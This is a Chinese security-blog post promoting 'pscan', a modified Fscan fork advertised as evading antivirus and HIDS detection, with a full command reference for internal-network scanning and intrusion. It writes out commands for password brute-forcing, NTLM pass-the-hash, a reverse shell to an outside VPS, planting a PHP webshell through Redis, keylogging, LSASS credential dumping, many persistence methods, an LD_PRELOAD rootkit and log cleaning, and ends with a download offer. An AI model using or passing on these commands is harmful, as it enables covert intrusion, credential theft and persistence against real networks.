内网扫描爆破后渗透一站式落地)
0x01 工具介绍pscan作为红队专属内网渗透新利器基于Fscan最新版本二次魔改优化彻底告别原版工具特征暴露问题完美支持主流安全软件免杀绕过。工具重构全部命令参数、去除官方指纹特征支持静默无痕迹运行集内网存活探测、端口扫描、弱口令爆破、POC漏洞检测、后渗透利用功能于一体实现内网渗透全流程一站式落地适配各类实战攻防场景。注意现在只对常读和星标的才展示大图推送建议大家把渗透安全HackTwo设为星标⭐️否则可能就看不到了啦下载地址在末尾 #渗透安全HackTwo0x02 功能介绍✨魔改版本功能本版本对原版 fscan 做了以下修改以规避 HIDS 特征检测修改项说明参数名混淆所有命令行参数重命名见下方映射表Banner 静默启动时不输出 fscan ASCII Logo 和版本信息模块名重命名Go 模块路径改为scanner/core去除项目名特征预编译二进制提供pscan.exe和core.exe两个版本免杀效果原版 ↔ 魔改参数映射原参数魔改后说明-h-t目标 IP / 网段 / 域名-eh-et排除主机-ehf-etf排除主机文件-p-tp端口-ep-etp排除端口-hf-tf主机列表文件-pf-tpf端口列表文件-m-st扫描模式-t线程-tn端口扫描线程数-time-tm超时时间(秒)-user-usr用户名-pwd-pw密码-usera-ua额外用户名-pwda-pa额外密码-userf-usrf用户名字典文件-pwdf-pf密码字典文件-upf-up用户名:密码对文件-hashf-hf哈希文件-hash-hv哈希值-domain-dm域名-sshkey-skSSH 私钥后渗透插件列表通过-local参数调用插件名功能平台systeminfo系统信息收集全平台reverseshell反弹 Shell全平台forwardshell正向 ShellWindowssocks5proxy启动 SOCKS5 代理全平台keylogger键盘记录WindowsminidumpLSASS 凭据提取WindowssshkeySSH 公钥注入Linuxcleaner痕迹清理全平台crontaskCron 持久化LinuxsystemdserviceSystemd 服务持久化LinuxldpreloadLD_PRELOAD RootkitLinuxwinregistry注册表持久化Windowswinschtask计划任务持久化Windowswinservice服务持久化Windowswinstartup启动项持久化Windowswinlogon登录脚本持久化WindowswinwmiWMI 持久化WindowswinbitsBITS 任务持久化WindowswinifeoIFEO 持久化WindowsWebUI 模式本工具内置了 Web 管理界面需使用 web 版本编译。# 启动 Web 服务pscan-web.exe# 指定监听端口pscan-web.exe -u# 启动后访问 http://127.0.0.1:8080WebUI 功能图形化扫描任务管理实时 WebSocket 结果推送扫描预设保存资产项目管理多语言支持中文/English深色模式0x03 更新介绍11 个检测模块SQLi / XSS / CMDi / LFI / RCE / SSRF / XXE / API / 敏感信息 / WAF / JSPathFinder 支持 GUI 图形界面和命令行两种模式 多种报告格式JSON / HTML / CSV / Markdown / Console 基于 WVS v19.2 开源更名0x04 使用介绍安装与使用指南内网扫描# 全量扫描整个 C 段最常用 pscan.exe -t 192.168.1.0/24 # 仅存活探测快速定位在线主机 pscan.exe -t 192.168.1.0/24 -ao # ICMP 模式存活探测 pscan.exe -t 192.168.1.0/24 -st icmp # 存活探测 仅在线主机做端口扫描跳过离线主机 pscan.exe -t 192.168.1.0/24 -ao -st all # 扫描多个网段 pscan.exe -t 192.168.1.0/24,10.10.0.0/16 # 扫描 IP 范围 pscan.exe -t 192.168.1.1-100 # 排除特定主机 pscan.exe -t 192.168.1.0/24 -et 192.168.1.1,192.168.1.254 # 从文件读取目标列表 pscan.exe -tf targets.txt端口与协议控制# 扫描指定端口 pscan.exe -t 192.168.1.0/24 -tp 22,80,443,3306,3389,6379 # 扫描常用 Web 端口 pscan.exe -t 192.168.1.0/24 -tp 80,81,443,8080,8443,9090 # 扫描全部端口慢谨慎使用 pscan.exe -t 192.168.1.0/24 -tp 1-65535 -tn 1000 # 排除特定端口 pscan.exe -t 192.168.1.0/24 -etp 445,139 # 跳过 Ping 探测纯 TCP 扫描适合禁 Ping 环境 pscan.exe -t 192.168.1.0/24 -np # 跳过 TCP 补充探测 pscan.exe -t 192.168.1.0/24 -ntp # 调整扫描线程和超时网络差时降低线程数 pscan.exe -t 192.168.1.0/24 -tn 200 -tm 5 # 限制发包速率规避流量检测 pscan.exe -t 192.168.1.0/24 -rate 1000弱口令爆破# 全量扫描 自动爆破默认开启 pscan.exe -t 192.168.1.0/24 # 禁用爆破只扫端口和服务识别 pscan.exe -t 192.168.1.0/24 -nobr # 指定自定义凭据 pscan.exe -t 192.168.1.0/24 -usr admin -pw admin123 # 使用字典文件 pscan.exe -t 192.168.1.0/24 -usrf users.txt -pf pass.txt # 使用用户名:密码对文件每行 user:pass pscan.exe -t 192.168.1.0/24 -up creds.txt # 添加额外用户/密码与原字典合并 pscan.exe -t 192.168.1.0/24 -ua root,admin -pa 123456,password # 指定域名用于域认证爆破 pscan.exe -t 192.168.1.0/24 -dm corp.local # SSH 私钥登录 pscan.exe -t 192.168.1.100 -sk id_rsa # NTLM 哈希传递 pscan.exe -t 192.168.1.100 -hv aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0Web 扫描# 扫描单个 Web 站点 pscan.exe -u http://192.168.1.100:8080 # 扫描多个 URL pscan.exe -u http://192.168.1.100 -tp 80,443,8080 # 带 Cookie 扫描 pscan.exe -u http://192.168.1.100 -cookie PHPSESSIDxxx # 使用 HTTP 代理 pscan.exe -u http://192.168.1.100 -proxy http://127.0.0.1:8080 # 使用 SOCKS5 代理 pscan.exe -t 192.168.1.0/24 -socks5 socks5://127.0.0.1:1080 # 指定网卡VPN 场景 pscan.exe -t 10.8.0.0/24 -iface 10.8.0.5POC 漏洞检测# 全量扫描 POC 检测默认开启 pscan.exe -t 192.168.1.0/24 # 禁用 POC 扫描加快速度 pscan.exe -t 192.168.1.0/24 -nopoc # 全量 POC 扫描更全面但更慢 pscan.exe -t 192.168.1.0/24 -full # 指定 POC 名称 pscan.exe -t 192.168.1.100 -pocname thinkphp # 自定义 POC 脚本目录 pscan.exe -t 192.168.1.100 -pocpath ./custom-pocs/ # 调整 POC 并发数 pscan.exe -t 192.168.1.0/24 -num 10 # 启用 DNSLog pscan.exe -t 192.168.1.0/24 -dns凭据复用与哈希传递# NTLM 哈希传递配合爆破模块使用 pscan.exe -t 192.168.1.100 -hv 31d6cfe0d16ae931b73c59d7e0c089c0 # 哈希文件批量传递 pscan.exe -t 192.168.1.0/24 -hf hashes.txt # 复用域用户凭据 pscan.exe -t 192.168.1.0/24 -usr administrator -pw Pssw0rd -dm corp.local后渗透利用# 查看所有可用本地插件 pscan.exe -local list # 收集系统信息 pscan.exe -local systeminfo # 反弹 Shell先在外网 VPS 监听 pscan.exe -local reverseshell -rsh your-vps.com:4444 # 启动正向 Shell等待目标连接 pscan.exe -local forwardshell -fsh-port 4444 # 启动 SOCKS5 代理本地监听 1080 pscan.exe -local socks5proxy -start-socks5 1080 # Redis 写公钥 pscan.exe -t 192.168.1.100 -st redis -rs ssh-rsa AAAAB3N... # Redis 写 Webshell pscan.exe -t 192.168.1.100 -st redis -rwp /var/www/html -rwc ?php system($_GET[cmd]);? # 键盘记录 pscan.exe -local keylogger -keylog-output keylog.txt # LSASS 凭证提取 pscan.exe -local minidump # Windows 持久化启动项 pscan.exe -local winstartup -win-pe C:\shell.exe # 清理痕迹 pscan.exe -local cleaner输出控制# 指定输出文件 pscan.exe -t 192.168.1.0/24 -o scan-result.txt # JSON 格式输出 pscan.exe -t 192.168.1.0/24 -f json -o result.json # CSV 格式输出 pscan.exe -t 192.168.1.0/24 -f csv -o result.csv # 不保存文件仅屏幕输出 pscan.exe -t 192.168.1.0/24 -no # 静默模式减少输出量 pscan.exe -t 192.168.1.0/24 -silent # 调试模式详细日志 pscan.exe -t 192.168.1.0/24 -debug # 输出性能统计 pscan.exe -t 192.168.1.0/24 -perf下载《渗透安全HackTwo》回复20260619获取下载
上实战部署软RAID 1:从模块黑名单到自动挂载)
)